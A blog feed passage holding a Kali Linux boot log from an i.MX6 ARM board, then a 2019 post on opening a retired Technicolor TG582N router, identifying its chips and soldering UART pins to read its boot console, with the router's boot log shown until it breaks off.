[    0.000000] L2C-310 dynamic clock gating enabled, standby mode enabled
[    0.000000] L2C-310 cache controller enabled, 16 ways, 1024 kB
[    0.000000] L2C-310: CACHE_ID 0x410000c7, AUX_CTRL 0x76470001
[    0.000000] Switching to timer-based delay loop, resolution 333ns
[    0.000007] sched_clock: 32 bits at 3000kHz, resolution 333ns, wraps every 715827882841ns
[    0.000029] clocksource: mxc_timer1: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 637086815595 ns
[    0.002450] Console: colour dummy device 80x30
[    0.002911] console [tty1] enabled
[    0.002962] Calibrating delay loop (skipped), value calculated using timer frequency.. 6.00 BogoMIPS (lpj=12000)
[    0.002997] pid_max: default: 32768 minimum: 301
[    0.003303] Security Framework initialized
[    0.003354] Yama: disabled by default; enable with sysctl kernel.yama.*
[    0.003456] AppArmor: AppArmor initialized
[    0.003587] Mount-cache hash table entries: 2048 (order: 1, 8192 bytes)
[    0.003621] Mountpoint-cache hash table entries: 2048 (order: 1, 8192 bytes)
[    0.004664] CPU: Testing write buffer coherency: ok
[    0.004713] CPU0: Spectre v2: using BPIALL workaround
[    0.005153] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000
[    0.005959] Setting up static identity map for 0x10300000 - 0x103000a0
[    0.007468] rcu: Hierarchical SRCU implementation.
[    0.011385] EFI services will not be available.
[    0.011904] smp: Bringing up secondary CPUs ...
[    0.012834] CPU1: thread -1, cpu 1, socket 0, mpidr 80000001
[    0.012842] CPU1: Spectre v2: using BPIALL workaround
[    0.013856] CPU2: thread -1, cpu 2, socket 0, mpidr 80000002
[    0.013863] CPU2: Spectre v2: using BPIALL workaround
[    0.014869] CPU3: thread -1, cpu 3, socket 0, mpidr 80000003
[    0.014878] CPU3: Spectre v2: using BPIALL workaround
[    0.015031] smp: Brought up 1 node, 4 CPUs
[    0.015056] SMP: Total of 4 processors activated (24.00 BogoMIPS).
[    0.015074] CPU: All CPU(s) started in SVC mode.
[    0.016528] devtmpfs: initialized
[    0.025641] VFP support v0.3: implementor 41 architecture 3 part 30 variant 9 rev 4
[    0.025992] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns
[    0.026032] futex hash table entries: 1024 (order: 4, 65536 bytes)
[    0.027375] pinctrl core: initialized pinctrl subsystem
[    0.028868] DMI not present or invalid.
[    0.029317] NET: Registered protocol family 16
[    0.033089] DMA: preallocated 256 KiB pool for atomic coherent allocations
[    0.033965] audit: initializing netlink subsys (disabled)
[    0.034242] audit: type=2000 audit(0.032:1): state=initialized audit_enabled=0 res=1
[    0.035939] CPU identified as i.MX6Q, silicon rev 1.2
[    0.056010] No ATAGs?
[    0.056179] hw-breakpoint: found 5 (+1 reserved) breakpoint and 1 watchpoint registers.
[    0.056220] hw-breakpoint: maximum watchpoint size is 4 bytes.
[    0.057982] imx6q-pinctrl 20e0000.iomuxc: initialized IMX pinctrl driver
[    0.058770] Serial: AMBA PL011 UART driver
[    0.081508] mxs-dma 110000.dma-apbh: initialized
[    0.083880] v_usb2: supplied by v_5v0
[    0.084147] vcc_3v3: supplied by v_5v0
[    0.084412] v_usb1: supplied by v_5v0
[    0.087824] vgaarb: loaded
[    0.089174] media: Linux media interface: v0.10
[    0.089232] videodev: Linux video capture interface: v2.00
[    0.089300] pps_core: LinuxPPS API ver. 1 registered
[    0.089322] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <[email protected]>
[    0.089361] PTP clock support registered
[    0.091199] clocksource: Switched to clocksource mxc_timer1
[    0.170784] VFS: Disk quotas dquot_6.6.0
[    0.170921] VFS: Dquot-cache hash table entries: 1024 (order 0, 4096 bytes)
[    0.171676] AppArmor: AppArmor Filesystem Enabled
[    0.184673] NET: Registered protocol family 2
[    0.185646] tcp_listen_portaddr_hash hash table entries: 512 (order: 0, 6144 bytes)
[    0.185706] TCP established hash table entries: 8192 (order: 3, 32768 bytes)
[    0.185812] TCP bind hash table entries: 8192 (order: 4, 65536 bytes)
[    0.185981] TCP: Hash tables configured (established 8192 bind 8192)
[    0.186238] UDP hash table entries: 512 (order: 2, 16384 bytes)
[    0.186300] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes)
[    0.186589] NET: Registered protocol family 1
[    0.187128] Unpacking initramfs...
[    1.822024] Freeing initrd memory: 19560K
[    1.822709] hw perfevents: no interrupt-affinity property for /pmu, guessing.
[    1.823063] hw perfevents: enabled with armv7_cortex_a9 PMU driver, 7 counters available
[    1.826095] Initialise system trusted keyrings
[    1.826400] workingset: timestamp_bits=14 max_order=19 bucket_order=5
[    1.833640] zbud: loaded
[    6.621158] Key type asymmetric registered
[    6.621192] Asymmetric key parser 'x509' registered
[    6.621275] bounce: pool size: 64 pages
[    6.621357] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 248)
[    6.621575] io scheduler noop registered
[    6.621597] io scheduler deadline registered
[    6.621849] io scheduler cfq registered (default)
[    6.621871] io scheduler mq-deadline registered
[    6.636572] imx-sdma 20ec000.sdma: firmware: failed to load imx/sdma/sdma-imx6q.bin (-2)
[    6.636604] firmware_class: See https://wiki.debian.org/Firmware for information about missing firmware
[    6.636636] imx-sdma 20ec000.sdma: Direct firmware load for imx/sdma/sdma-imx6q.bin failed with error -2
[    6.641836] imx-pgc-pd imx-pgc-power-domain.0: DMA mask not set
[    6.641921] imx-pgc-pd imx-pgc-power-domain.0: Linked as a consumer to 20dc000.gpc
[    6.641999] imx-pgc-pd imx-pgc-power-domain.1: DMA mask not set
[    6.644727] Serial: 8250/16550 driver, 4 ports, IRQ sharing disabled
[    6.647473] Serial: AMBA driver
[    6.648404] 2020000.serial: ttymxc0 at MMIO 0x2020000 (irq = 26, base_baud = 5000000) is a IMX
[    7.412939] console [ttymxc0] enabled
[    7.417932] 21f0000.serial: ttymxc3 at MMIO 0x21f0000 (irq = 66, base_baud = 5000000) is a IMX
[    7.430698] libphy: Fixed MDIO Bus: probed
[    7.435760] fec 2188000.ethernet: 2188000.ethernet supply phy not found, using dummy regulator
[    7.444505] fec 2188000.ethernet: Linked as a consumer to regulator.0
[    7.454609] pps pps0: new PPS source ptp0
[    7.472545] libphy: fec_enet_mii_bus: probed
[    7.477455] fec 2188000.ethernet eth0: registered PHC device 0
[    7.484318] mousedev: PS/2 mouse device common for all mice
[    7.492641] snvs_rtc 20cc000.snvs:snvs-rtc-lp: rtc core: registered 20cc000.snvs:snvs-rtc-lp as rtc0
[    7.505875] ledtrig-cpu: registered to indicate activity on CPUs
[    7.514034] NET: Registered protocol family 10
[    7.544056] Segment Routing with IPv6
[    7.547877] mip6: Mobile IPv6
[    7.550868] NET: Registered protocol family 17
[    7.555362] mpls_gso: MPLS GSO support
[    7.559621] ThumbEE CPU extension supported.
[    7.563941] Registering SWP/SWPB emulation handler
[    7.569571] registered taskstats version 1
[    7.573724] Loading compiled-in X.509 certificates
[    8.001824] Loaded X.509 cert 'secure-boot-test-key-lfaraone: 97c1b25cddf9873ca78a58f3d73bf727d2cf78ff'
[    8.011399] zswap: loaded using pool lzo/zbud
[    8.016135] AppArmor: AppArmor sha1 policy hashing enabled
[    8.043332] input: gpio-keys as /devices/soc0/gpio-keys/input/input0
[    8.050476] snvs_rtc 20cc000.snvs:snvs-rtc-lp: setting system clock to 1970-01-01 00:00:00 UTC (0)
[    8.059503] sr_init: No PMIC hook to init smartreflex
[    8.065540] brcm_reg: disabling
[    8.068731] v_usb2: disabling
[    8.071738] v_usb1: disabling
[    8.091956] Freeing unused kernel memory: 2048K
[    8.103524] Run /init as init process
[    8.674401] vdd1p1: supplied by regulator-dummy
[    8.683877] vdd3p0: supplied by regulator-dummy
[    8.696602] vdd2p5: supplied by regulator-dummy
[    8.704227] vddarm: supplied by regulator-dummy
[    8.717686] sdhci: Secure Digital Host Controller Interface driver
[    8.718779] i2c i2c-1: IMX I2C adapter registered
[    8.723983] sdhci: Copyright(c) Pierre Ossman
[    8.731604] i2c i2c-1: can't use DMA, using PIO instead.
[    8.742702] sdhci-pltfm: SDHCI platform and OF driver helper
[    8.742793] usbcore: registered new interface driver usbfs
[    8.744626] vddpu: supplied by regulator-dummy
[    8.745481] imx-pgc-pd imx-pgc-power-domain.1: Linked as a consumer to regulator.10
[    8.745595] imx-pgc-pd imx-pgc-power-domain.1: Linked as a consumer to 20dc000.gpc
[    8.745890] vddsoc: supplied by regulator-dummy
[    8.752088] sdhci-esdhc-imx 2190000.usdhc: allocated mmc-pwrseq
[    8.756034] usbcore: registered new interface driver hub
[    8.763812] sdhci-esdhc-imx 2190000.usdhc: Linked as a consumer to regulator.2
[    8.763929] SCSI subsystem initialized
[    8.766600] usbcore: registered new device driver usb
[    8.787503] rtc-pcf8523 2-0068: rtc core: registered rtc-pcf8523 as rtc1
[    8.796044] ahci-imx 2200000.sata: fsl,transmit-level-mV value 1104, using 00000044
[    8.798351] i2c i2c-2: IMX I2C adapter registered
[    8.801051] ahci-imx 2200000.sata: fsl,transmit-boost-mdB value 0, using 00000000
[    8.801481] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[    8.807283] i2c i2c-2: can't use DMA, using PIO instead.
[    8.809805] imx_usb 2184000.usb: Linked as a consumer to regulator.5
[    8.812940] ahci-imx 2200000.sata: fsl,transmit-atten-16ths value 9, using 00002000
[    8.812952] ahci-imx 2200000.sata: fsl,receive-eq-mdB not specified, using 05000000
[    8.868067] ci_hdrc ci_hdrc.0: EHCI Host Controller
[    8.870498] ahci-imx 2200000.sata: SSS flag set, parallel bus scan disabled
[    8.873075] ci_hdrc ci_hdrc.0: new USB bus registered, assigned bus number 1
[    8.880090] ahci-imx 2200000.sata: AHCI 0001.0300 32 slots 1 ports 3 Gbps 0x1 impl platform mode
[    8.896015] ahci-imx 2200000.sata: flags: ncq sntf stag pm led clo only pmp pio slum part ccc apst 
[    8.906799] scsi host0: ahci-imx
[    8.907234] ci_hdrc ci_hdrc.0: USB 2.0 started, EHCI 1.00
[    8.911034] ata1: SATA max UDMA/133 mmio [mem 0x02200000-0x02203fff] port 0x100 irq 69
[    8.915842] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002, bcdDevice= 4.19
[    8.931867] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[    8.939144] usb usb1: Product: EHCI Host Controller
[    8.944065] usb usb1: Manufacturer: Linux 4.19.0-kali1-armmp ehci_hcd
[    8.950543] usb usb1: SerialNumber: ci_hdrc.0
[    8.955839] hub 1-0:1.0: USB hub found
[    8.959699] hub 1-0:1.0: 1 port detected
[    8.964941] imx_usb 2184200.usb: Linked as a consumer to regulator.4
[    8.975338] ci_hdrc ci_hdrc.1: EHCI Host Controller
[    8.980298] ci_hdrc ci_hdrc.1: new USB bus registered, assigned bus number 2
[    9.003239] ci_hdrc ci_hdrc.1: USB 2.0 started, EHCI 1.00
[    9.008943] usb usb2: New USB device found, idVendor=1d6b, idProduct=0002, bcdDevice= 4.19
[    9.017268] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[    9.024541] usb usb2: Product: EHCI Host Controller
[    9.029458] usb usb2: Manufacturer: Linux 4.19.0-kali1-armmp ehci_hcd
[    9.035939] usb usb2: SerialNumber: ci_hdrc.1
[    9.041101] hub 2-0:1.0: USB hub found
[    9.044948] hub 2-0:1.0: 1 port detected
[    9.107896] mmc0: SDHCI controller on 2190000.usdhc [2190000.usdhc] using ADMA
[    9.117185] sdhci-esdhc-imx 2194000.usdhc: Got CD GPIO
[    9.122559] sdhci-esdhc-imx 2194000.usdhc: Linked as a consumer to regulator.1
[    9.157220] mmc0: queuing unknown CIS tuple 0x80 (50 bytes)
[    9.163693] mmc1: SDHCI controller on 2194000.usdhc [2194000.usdhc] using ADMA
[    9.183174] mmc0: queuing unknown CIS tuple 0x80 (7 bytes)
[    9.191609] mmc0: queuing unknown CIS tuple 0x80 (4 bytes)
[    9.211322] random: fast init done
[    9.224126] mmc1: host does not support reading read-only switch, assuming write-enable
[    9.240939] mmc1: new high speed SDHC card at address aaaa
[    9.245854] ata1: SATA link down (SStatus 0 SControl 300)
[    9.249128] mmc0: queuing unknown CIS tuple 0x02 (1 bytes)
[    9.251988] ahci-imx 2200000.sata: no device found, disabling link.
[    9.258217] mmcblk1: mmc1:aaaa SC16G 14.8 GiB 
[    9.263773] ahci-imx 2200000.sata: pass .hotplug=1 to enable hotplug
[    9.285255] mmc0: new SDIO card at address 0001
[    9.294093]  mmcblk1: p1
[    9.590133] EXT4-fs (mmcblk1p1): mounted filesystem with ordered data mode. Opts: (null)
[   10.331270] systemd[1]: System time before build time, advancing clock.
[   10.410380] systemd[1]: Inserted module 'autofs4'
[   10.477486] systemd[1]: systemd 240 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)
[   10.499686] systemd[1]: Detected architecture arm.
[   10.532504] systemd[1]: Set hostname to <kali>.
[   11.143992] random: systemd: uninitialized urandom read (16 bytes read)
[   11.169989] random: systemd: uninitialized urandom read (16 bytes read)
[   11.177217] systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
[   11.185774] random: systemd: uninitialized urandom read (16 bytes read)
[   11.192813] systemd[1]: Listening on initctl Compatibility Named Pipe.
[   11.205244] systemd[1]: Created slice system-getty.slice.
[   11.212034] systemd[1]: Listening on Journal Audit Socket.
[   11.219580] systemd[1]: Created slice User and Session Slice.
[   11.225807] systemd[1]: Reached target Slices.
[   11.231852] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point.
[   11.644705] systemd-journald[174]: Received request to flush runtime journal from PID 1
[   11.715275] systemd-journald[174]: File /var/log/journal/1669a518f9704310aef53c26dee3d53f/system.journal corrupted or uncleanly shut down, renaming and replacing.
[   13.195395] cpu cpu0: Linked as a consumer to regulator.9
[   13.202118] cpu cpu0: Linked as a consumer to regulator.10
[   13.212353] leds_pwm pwmleds: unable to request PWM for imx6:red:front: -517
[   13.229703] Registered IR keymap rc-empty
[   13.230963] cpu cpu0: Linked as a consumer to regulator.11
[   13.239476] rc rc0: gpio_ir_recv as /devices/soc0/ir-receiver/rc/rc0
[   13.247800] input: gpio_ir_recv as /devices/soc0/ir-receiver/rc/rc0/input1
[   13.291628] rc rc0: lirc_dev: driver gpio_ir_recv registered at minor = 0, raw IR receiver, no transmitter
[   13.292420] leds_pwm pwmleds: unable to request PWM for imx6:red:front: -517
[   13.368979] leds_pwm pwmleds: unable to request PWM for imx6:red:front: -517
[   13.447837] imx2-wdt 20bc000.wdog: timeout 60 sec (nowayout=0)
[   13.466369] etnaviv etnaviv: bound 130000.gpu (ops gpu_ops [etnaviv])
[   13.495507] imx-ipuv3 2400000.ipu: IPUv3H probed
[   13.505100] etnaviv etnaviv: bound 134000.gpu (ops gpu_ops [etnaviv])
[   13.515092] imx-ipuv3 2800000.ipu: IPUv3H probed
[   13.528373] etnaviv etnaviv: bound 2204000.gpu (ops gpu_ops [etnaviv])
[   13.535094] etnaviv-gpu 130000.gpu: model: GC2000, revision: 5108
[   13.591018] etnaviv-gpu 134000.gpu: model: GC320, revision: 5007
[   13.690303] etnaviv-gpu 2204000.gpu: model: GC355, revision: 1215
[   13.696497] etnaviv-gpu 2204000.gpu: Ignoring GPU with VG and FE2.0
[   13.723715] [drm] Initialized etnaviv 1.2.0 20151214 for etnaviv on minor 0
[   13.732615] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[   13.739343] [drm] No driver support for vblank timestamp query.
[   13.750344] imx-drm display-subsystem: bound imx-ipuv3-crtc.2 (ops ipu_crtc_ops [imxdrm])
[   13.758969] imx-drm display-subsystem: bound imx-ipuv3-crtc.3 (ops ipu_crtc_ops [imxdrm])
[   13.794123] imx-drm display-subsystem: bound imx-ipuv3-crtc.6 (ops ipu_crtc_ops [imxdrm])
[   13.824654] imx-drm display-subsystem: bound imx-ipuv3-crtc.7 (ops ipu_crtc_ops [imxdrm])
[   13.887633] imx-spdif sound-spdif: snd-soc-dummy-dai <-> 2004000.spdif mapping ok
[   13.895250] imx-spdif sound-spdif: ASoC: no DMI vendor name!
[   13.910615] dwhdmi-imx 120000.hdmi: Detected HDMI TX controller v1.30a with HDCP (DWC HDMI 3D TX PHY)
[   13.960699] imx-drm display-subsystem: bound 120000.hdmi (ops dw_hdmi_imx_platform_driver_exit [dw_hdmi_imx])
[   13.982623] [drm] Cannot find any crtc or sizes
[   14.009662] [drm] Initialized imx-drm 1.0.0 20120507 for display-subsystem on minor 1
[   14.236656] brcmfmac: brcmf_fw_alloc_request: using brcm/brcmfmac4329-sdio for chip BCM4329/3
[   14.258745] usbcore: registered new interface driver brcmfmac
[   14.323949] brcmfmac mmc0:0001:1: firmware: direct-loading firmware brcm/brcmfmac4329-sdio.bin
[   14.346226] brcmfmac mmc0:0001:1: firmware: direct-loading firmware brcm/brcmfmac4329-sdio.txt
[   14.465318] brcmfmac: brcmf_fw_alloc_request: using brcm/brcmfmac4329-sdio for chip BCM4329/3
[   14.475922] brcmfmac mmc0:0001:1: firmware: failed to load brcm/brcmfmac4329-sdio.clm_blob (-2)
[   14.484716] brcmfmac mmc0:0001:1: Direct firmware load for brcm/brcmfmac4329-sdio.clm_blob failed with error -2
[   14.494898] brcmfmac: brcmf_c_process_clm_blob: no clm_blob available (err=-2), device may have limited channels available
[   14.551518] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM4329/3 wl0: Sep  2 2011 14:48:19 version 4.220.48
[   14.594871] brcmfmac: brcmf_setup_wiphybands: rxchain error (-52)
[   14.706815] Bluetooth: Core ver 2.22
[   14.710651] NET: Registered protocol family 31
[   14.715230] Bluetooth: HCI device and connection manager initialized
[   14.722069] Bluetooth: HCI socket layer initialized
[   14.727404] Bluetooth: L2CAP socket layer initialized
[   14.733014] Bluetooth: SCO socket layer initialized
[   14.760303] Bluetooth: Generic Bluetooth SDIO driver ver 0.1
[   15.011475] [drm] Cannot find any crtc or sizes
[   15.050996] random: crng init done
[   15.054429] random: 7 urandom warning(s) missed due to ratelimiting
[   16.793010] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[   16.887242] rc rc0: two consecutive events of type space
[   16.934160] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[   16.942551] brcmfmac: _brcmf_set_multicast_list: Setting BRCMF_C_SET_PROMISC failed, -52
[   16.956655] brcmfmac: _brcmf_set_multicast_list: Setting BRCMF_C_SET_PROMISC failed, -52
[   17.551975] Atheros 8035 ethernet 2188000.ethernet-1:00: attached PHY driver [Atheros 8035 ethernet] (mii_bus:phy_addr=2188000.ethernet-1:00, irq=POLL)
[   17.570856] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[   17.579170] brcmfmac: _brcmf_set_multicast_list: Setting BRCMF_C_SET_PROMISC failed, -52
[   17.835444] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready

Kali GNU/Linux Rolling kali ttymxc0

kali login: 

Thanks to Steev for the late night support and, obviously, Offensive Security.

Reverse engineering the router Technicolor TG582N

7 February 2019 at 09:00
By: Kartone
Reverse engineering the router Technicolor TG582N

During last months, my interest in hardware hacking got an exponential growth due to the fact I had the chance to get my hands on some so-ho routers unretired from local Telcos. So what a great opportunity to open and try to crack them, without worrying about irreparable damage?

Inspecting the device

My first device was the Technicolor TG582N distributed in Italy by Fastweb.

Reverse engineering the router Technicolor TG582N
Front side
Reverse engineering the router Technicolor TG582N
Back side

Nothing too much interesting externally: for this purpose, common useless informations about wireless access code, serial number, mac-address, etc.

A much more interesting view is the internal one: I was able to remove the two lower screws, under the rubbers and, with a gentle lever, the upper part can be unhooked giving access to the router motherboard.

Reverse engineering the router Technicolor TG582N
Router motherboard with the relevant ICs

Internal components analysis

A pretty standard design for this kind of device, we can clearly see the main CPU Broadcom BCM63281KFBG and its two memory ICs (Integrated Circuits): RAM and Flash memory. There's also another Broadcom chip but its role is to manage wireless functionalities and, for now, is out of scope.

Reverse engineering the router Technicolor TG582N
Winbond W9751G6KB-25
Reverse engineering the router Technicolor TG582N
Spansion FL064PIF

For the volatile data, the device uses a DDR2 SDRAM module produced by Winbond with the capacity 512 Mbit (64 MByte). Obviously I'm interested in the EEPROM chip, because it's where the non-volatile data is stored and persists across reboots and shutdowns. This device has a flash memory module produced by Spansion (now Cypress) with the capacity of 64 Mbit (8 Mbyte).

Accessing to UART console

I didn't put too much effort in this because the nice guys of OpenWRT project did all the dirty job. Although the board perfectly matches to the devices described in that page, I noted a slight difference on the EEPROM chip. They mention three board type: DANT-1, DANT-T, and DANT-V. These boards have three types of EEPROM chip but none of them have this Spansion chip, only the DANT-V version has a Spansion chip but it's an FL129P, a 128 Mbit flash memory. We're definitely dealing with a slightly smaller memory chip. Anyway, UART pins are the same of other boards and we need to solder 3 pins (Tx, Rx, and GND) and short circuit R62 and R63 as noted in the above link.

Reverse engineering the router Technicolor TG582N
Soldered UART pins

After this little soldering, we can attach a common interface based on the FTD232 and have a console access. Remember to NOT attach the VCC pin because the required power will be provided by the standard supply.

Reverse engineering the router Technicolor TG582N

With this simple setup we can finally have access to the router console and see all the boot messages:

Welcome to minicom 2.7.1                                                                                
OPTIONS: I18n                                                                                           
Compiled on May  3 2018, 15:20:11.                                                                      
Port /dev/ttyUSB0, 17:40:25                                                                             
Press CTRL-A Z for help on special keys


D%G                                                                                                     
Decompressing Bootloader..............................                                                  
Gateway initialization sequence started.                                                                
Version BL: 1.0.5
Multicore disable; Booting Linux kernel
BOOTING THE LINUX KERNEL
Starting the kernel @ 0x801dfcd0
Extra parameters passed to Linux:
        [0]: bootloader
        [1]: memsize=0x3EDD000
Linux version 2.6.30 (gcc version 3.4.6) #1 Mon Mar 26 18:25:38 CST 2012
BCM63XX prom init
CPU revision is: 0002a075 (Broadcom4350)
Determined physical RAM map:
 memory: 03edb000 @ 00002000 (usable)
Wasting 64 bytes for tracking 2 unused pages
Zone PFN ranges:
  DMA      0x00000002 -> 0x00001000
  Normal   0x00001000 -> 0x00003edd
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000002 -> 0x00003edd
On node 0 totalpages: 16091
free_area_init_node: node 0, pgdat 80238480, node_mem_map 81000040
  DMA zone: 32 pages used for memmap
  DMA zone: 0 pages reserved
  DMA zone: 4062 pages, LIFO batch:0
  Normal zone: 94 pages used for memmap
  Normal zone: 11903 pages, LIFO batch:1
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 15965
Kernel command line: root=31:0 ro noinitrd memsize=0x3EDD000 console=ttyS0,115200 root=/dev/mtdblock2 rootfstype=squashfs
wait instruction: enabled
Primary instruction cache 32kB, VIPT, 4-way, linesize 16 bytes.
Primary data cache 32kB, 2-way, VIPT, cache aliases, linesize 16 bytes
NR_IRQS:128
PID hash table entries: 256 (order: 8, 1024 bytes)
console [ttyS0] enabled
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Memory: 61152k/64364k available (1882k kernel code, 3192k reserved, 331k data, 108k init, 0k highmem)
Calibrating delay loop... 318.46 BogoMIPS (lpj=159232)
Mount-cache hash table entries: 512
--Kernel Config--
  SMP=0
  PREEMPT=0
  DEBUG_SPINLOCK=0
  DEBUG_MUTEXES=0
net_namespace: 584 bytes
NET: Registered protocol family 16
registering PCI controller with io_map_base unset
registering PCI controller with io_map_base unset
bio: create slab <bio-0> at 0
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
pci 0000:00:09.0: reg 10 32bit mmio: [0x10002600-0x100026ff]
pci 0000:00:0a.0: reg 10 32bit mmio: [0x10002500-0x100025ff]
pci 0000:01:00.0: PME# supported from D0 D3hot
pci 0000:01:00.0: PME# disabled
pci 0000:02:00.0: reg 10 64bit mmio: [0x000000-0x003fff]
pci 0000:02:00.0: supports D1 D2
pci 0000:01:00.0: PCI bridge, secondary bus 0000:02
pci 0000:01:00.0:   IO window: disabled
pci 0000:01:00.0:   MEM window: 0x10f00000-0x10ffffff
pci 0000:01:00.0:   PREFETCH window: disabled
PCI: Enabling device 0000:01:00.0 (0000 -> 0002)
PCI: Setting latency timer of device 0000:01:00.0 to 64
BLOG Rule v1.0 Initialized
Broadcom IQoS v0.1 Mar 26 2012 18:23:40 initialized
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
squashfs: version 4.0 (2009/01/31) Phillip Lougher
squashfs: version 4.0 with LZMA457 ported by BRCM
JFFS2 version 2.2. (NAND) Β© 2001-2006 Red Hat, Inc.
msgmni has been set to 119
io scheduler noop registered (default)
pcieport-driver 0000:01:00.0: device [14e4:6328] has invalid IRQ; check vendor BIOS
PCI: Setting latency timer of device 0000:01:00.0 to 64
Gateway flash mapping
flash mapping initialized
Creating 4 MTD partitions on "thomson-spi":
0x000000040000-0x0000000b0000 : "userfs"
0x000000020000-0x000000040000 : "mtdss"
0x000000180000-0x000000800000 : "rootfs"
0x0000000b0000-0x000000180000 : "kernel"
brcmboard: brcm_board_init entry
Serial: BCM63XX driver $Revision: 3.00 $
ttyS0 at MMIO 0xb0000100 (irq = 36) is a BCM63XX
ttyS1 at MMIO 0xb0000100 (irq = 36) is a BCM63XX
ttyS2 at MMIO 0xb0000120 (irq = 47) is a BCM63XX
TCP cubic registered
NET: Registered protocol family 17
NET: Registered protocol family 15
VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
Freeing unused kernel memory: 108k freed
init started:  BusyBox v1.00 (2012.03.26-10:27+0000) multi-call binary
init started:  BusyBox v1.00 (2012.03.26-10:27+0000) multi-call binary
Starting pid 116, console /dev/ttyS0: '/etc/init.d/rcS'
Initializing random number generator
Using /lib/modules/kserport.ko
kserport: module license 'unspecified' taints kernel.
Disabling lock debugging due to kernel taint
Using /nmon/nmon.ko
loading geniodb kernel modules...
Using /lib/modules/geniodb.ko
 geniodb driver: Loading ...
 geniodb driver: Loading finished with SUCCESS
Button char device has been created and initialized.
[BCM ADSL] BcmAdsl_SetOverlayMode = 85 new=0
tmm_skb_desc.queuesize = 300
queue: 0xc09aa744
queue: 0xc09aa744, rp: 0xc09aa744, wp: 0xc09aa744
[BCM ADSL] ------    dslFileLoadImage : OverlayMode = 0 fname=ZXD3AA
pci 0000:00:09.0: firmware: requesting ZXD3AA
pSdramPHY=0xA3FFFFF8, 0x5CF9A 0xDEADBEEF
[BCM ADSL] Firmware load : 548088 548088 LMEM=(0xB0D80000, 11380) SDRAM=(0xA3F00000, 536700)
pci 0000:00:09.0: firmware: requesting phy
*** PhySdramSize got adjusted: 0x8307C => 0x98A20 ***
AdslCoreSharedMemInit: shareMemAvailable=423360
AdslCoreHwReset:  pLocSbSta=c09a2fd0 bkupThreshold=1600
AdslCoreHwReset:  AdslOemDataAddr = 0xA3F78090
[DSL driver] !-!-!-!-!-!-! ***** AFE ID = 0x1040a200
ADSL PHY version is A2pDT002a.d23k
b6w_init
FOUND WL DEVICE 0, bus=2, device=0, func=0, vendorid=14E4, deviceid=A8DC, regaddr=10F00000, irq=31
wl:srom not detected, using main memory mapped srom info(wombo board)
veth0 (): not using net_device_ops yet
NET: Registered protocol family 3
NET: Registered protocol family 9
NET: Registered protocol family 6
NET: Registered protocol family 4
NET: Registered protocol family 5
NET: Registered protocol family 18
NET: Registered protocol family 25
Device ipsec not present.
voice will be loaded
Device endpoint not present.
Device ikanos not present.
Starting pid 338, console /dev/ttyS0: '/etc/init.d/rc'
Switching to RUNLEVEL 1 ...
Disabling hotplug helper
route: SIOC[ADD|DEL]RT: File exists
linux application start ...
wait for linux_appl to initialize (1)
wait for linux_appl to initialize (2)
************* ERROR RECORD *************
000000:00:00.000000
Application NMON started after POWERON.
****************** END *****************
wait for linux_appl to initialize (3)
appl_init: BUILD VERIFIED!
wait for linux_appl to initialize (4)
[SS EMUL] ERR: opening config file /active/ss.conf failed
End of initialisation
wait for linux_appl to initialize (5)
 start fseventd ...
 fseventd is started.
 start storagepl ...
 storagepl is started
 start vfspl ...
 vfspl is started
MVFS plugin started
cifs plug-in: initializing ...
 cifs plug-in is started
upnpavpl start ...
/usr/bin/fusermount
Loading fuse modulefuse init (API version 7.11)
.
Mounting fuse control filesystem.
linuxappl: start loading after [  4459ms ]
WARNING: Unknown Parameter Type ifmfilter
WARNING: Unknown Parameter Type ifmfilter
S67stopload: wait until configuration load reaches phase 9...
S67stopload: wait until configuration load reaches phase 9 (now -1, 1s)
adsl: adsl_open entry
ADSL Line state is: DOWN
[adsl] trace = 5 0
S67stopload: wait until configuration load reaches phase 9 (now -1, 2s)
The OBC bridge interface cannot be removed from this VLAN, because OBC is defined as untagged.
S67stopload: wait until configuration load reaches phase 9 (now 3, 3s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 4s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 5s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 6s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 7s)
DyingGasp RIP BIT is set!
[ERROR : [DIAG 1004] -1 ]
ADSL configuration:
        adslmultimode = adsl2plus
        syslog = disabled
S67stopload: wait until configuration load reaches phase 9 (now 3, 8s)
S67stopload: wait until configuration load reaches phase 9 (now 3, 9s)
The OBC bridge interface cannot be removed from this VLAN, because OBC is defined as untagged.
Option not allowed => HostNotLocalDomain
Unsupported URL. The url must include http:// or https://.
